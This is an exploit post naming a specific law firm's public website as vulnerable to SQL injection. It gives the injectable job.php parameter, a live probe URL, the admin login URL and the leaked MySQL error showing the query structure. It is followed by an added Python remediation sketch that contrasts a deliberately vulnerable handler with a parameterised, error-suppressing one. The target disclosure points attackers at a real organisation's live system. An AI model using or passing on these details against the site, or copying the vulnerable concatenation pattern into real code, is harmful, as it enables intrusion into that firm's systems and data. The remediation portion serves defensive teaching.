# Exploit Title: Fagen Friedman & Fulfrost LLP SQLi
# Date: 10 Sep 2019
# Author: H.BBF3.4 & A.BBF3.4
+++++++++++++++++++++++++
ABOUT Fagen Friedman & Fulfrost:
Fagen Friedman & Fulfrost’s attorneys are leaders in their fields and diverse in experience, education and interests. Our firm offers comprehensive legal services to school districts, county offices of education, Special Education Local Plan Areas, and community colleges.
Fagen Friedman & Fulfrost LLP "F3" represents nearly 400 of California's educational institutions and related agencies. These institutions include school districts, community college districts, SELPAs, county offices of education and public agencies.
++++++++++++++++++++++++++
# SQL Injection Exploit:
**********************
job.php?jid=
# Example Vulnerable Sites:
*************************
[+] https://www.f3law.com/job.php?jid=9%27
Admin login:
https://www.f3law.com/admin/
# Example SQL Database Error:
****************************
ERROR: Select Sidebars
MySQL said: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND s.active = 'Y' ORDER BY sort_order' at line 4
Query: SELECT * FROM sidebars s INNER JOIN sidebars_jobs sp ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = 9' AND s.active = 'Y' ORDER BY sort_order;
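
# Remediation example (added; not the site's code):
The error above shows the jid value placed unquoted into the SQL text and the full query echoed back to the client. The sketch below is an added example that reproduces that pattern next to a hardened handler; it uses an in-memory SQLite database as a stand-in for MySQL, and the schema, rows and function names are constructed assumptions based only on the query shown in the error.

```python
import sqlite3

# Constructed schema and rows; table/column names come from the query in the error output.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sidebars (sidebar_id INTEGER PRIMARY KEY, title TEXT,
                               active TEXT, sort_order INTEGER);
        CREATE TABLE sidebars_jobs (sidebar_id INTEGER, idjob_post INTEGER);
        INSERT INTO sidebars VALUES (1, 'Benefits', 'Y', 2), (2, 'Apply', 'Y', 1),
                                    (3, 'Retired', 'N', 3);
        INSERT INTO sidebars_jobs VALUES (1, 9), (2, 9), (3, 9), (1, 10);
    """)
    return db

BASE = ("SELECT s.title FROM sidebars s INNER JOIN sidebars_jobs sp "
        "ON s.sidebar_id = sp.sidebar_id WHERE sp.idjob_post = ")
TAIL = " AND s.active = 'Y' ORDER BY sort_order"

def sidebars_vulnerable(db, jid):
    """Pattern implied by the error: jid is pasted unquoted into the SQL text,
    and the database error plus the full query are echoed to the client."""
    query = BASE + jid + TAIL
    try:
        return [r[0] for r in db.execute(query)]
    except sqlite3.Error as exc:
        return f"ERROR: Select Sidebars\nDB said: {exc}\nQuery: {query}"

def sidebars_hardened(db, jid):
    """Validate jid as a non-negative integer, bind it as a parameter, and
    keep database errors out of the response."""
    if not (jid.isascii() and jid.isdigit()) or len(jid) > 10:
        return []                      # reject before touching the database
    try:
        rows = db.execute(BASE + "?" + TAIL, (int(jid),))
        return [r[0] for r in rows]
    except sqlite3.Error:
        return []                      # log server-side; the client gets nothing

if __name__ == "__main__":
    db = make_db()
    for jid in ("9", "9'"):
        print(repr(jid), "vulnerable:", sidebars_vulnerable(db, jid))
        print(repr(jid), "hardened:  ", sidebars_hardened(db, jid))
```

Both changes matter: the bound parameter removes the injection point, and suppressing the database error stops the query structure from being disclosed.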